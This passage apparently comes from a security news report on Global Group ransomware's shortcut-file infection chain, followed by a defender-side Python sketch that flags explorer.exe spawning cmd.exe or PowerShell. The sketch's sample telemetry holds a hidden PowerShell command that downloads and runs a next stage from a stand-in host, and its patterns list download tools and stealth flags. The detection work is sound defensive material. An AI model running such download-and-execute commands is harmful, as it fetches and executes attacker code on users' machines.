Unlike many modern ransomware operations that depend on external command-and-control (C2) infrastructure, the Global Group payload executes locally as soon as it is delivered, complicating detection and response by conventional network-centric security controls, the researchers noted.
Weaponized LNK files
The infection chain begins with a user opening a shortcut file with a double extension, such as "Doc.doc.lnk". Because Windows hides file extensions by default, the file appears to the user as a legitimate document. The shortcut icon is also customized to resemble a Microsoft Word file to further reduce suspicion.
When executed, the .lnk file launches built-in Windows utilities, including cmd.exe and PowerShell, to retrieve and execute the next-stage payload. Because no exploit is involved, this technique lets attackers bypass security controls that focus on malicious documents or executable attachments.
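The two observables above (a document extension hidden in front of .lnk, and explorer.exe spawning cmd.exe or PowerShell to fetch a next stage) translate directly into endpoint checks. The following Python sketch is an added defender-side example, not code from the report or its authors; the Sysmon-style field names, the extension and utility lists, and the sample events are assumptions.

```python
import re
from pathlib import PureWindowsPath

# Document extensions an attacker may place in front of ".lnk" (assumed list).
DOCUMENT_EXTS = {".doc", ".docx", ".pdf", ".xls", ".xlsx", ".txt", ".rtf"}
# Built-in utilities the shortcut abuses to fetch the next stage.
LOTL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe"}
DOWNLOAD_HINTS = re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|"
                            r"\bcurl\b|\bwget\b|bitsadmin|certutil", re.I)
STEALTH_FLAGS = re.compile(r"-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile|-enc\b|-encodedcommand", re.I)

def is_masquerading_lnk(filename: str) -> bool:
    """True when a shortcut carries a document extension right before .lnk (e.g. Doc.doc.lnk)."""
    suffixes = [s.lower() for s in PureWindowsPath(filename).suffixes]
    return len(suffixes) >= 2 and suffixes[-1] == ".lnk" and suffixes[-2] in DOCUMENT_EXTS

def flag_lnk_spawn(event: dict) -> list:
    """Reasons a process-creation event matches the LNK -> cmd/PowerShell pattern ([] = no match).
    Keys on explorer.exe as parent, which is what a user double-clicking a shortcut produces."""
    reasons = []
    parent = PureWindowsPath(event.get("parent_image", "")).name.lower()
    image = PureWindowsPath(event.get("image", "")).name.lower()
    cmdline = event.get("command_line", "")
    if parent == "explorer.exe" and image in LOTL_IMAGES:
        reasons.append(f"explorer.exe spawned {image}")
        if DOWNLOAD_HINTS.search(cmdline):
            reasons.append("command line retrieves a remote payload")
        if STEALTH_FLAGS.search(cmdline):
            reasons.append("hidden or non-interactive PowerShell flags")
    return reasons

# Constructed sample telemetry (Sysmon-style field names), not real captured events.
SAMPLE_EVENTS = [
    {"id": 1, "parent_image": r"C:\Windows\explorer.exe", "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c powershell -w hidden -nop -c \"IEX (New-Object Net.WebClient)"
                     ".DownloadString('http://example.invalid/stage2')\""},
    {"id": 2, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": "WINWORD.EXE /n report.docx"},
    {"id": 3, "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe"},  # interactive launch: parent/child match only
]

def scan(events: list) -> dict:
    """Map event id -> reasons for every event that matched at least one check."""
    return {e["id"]: r for e in events if (r := flag_lnk_spawn(e))}
```

Event 3 shows why the parent/child pair alone is a weak signal: a user opening PowerShell from the desktop produces the same pair, so the download and stealth-flag reasons are what raise severity.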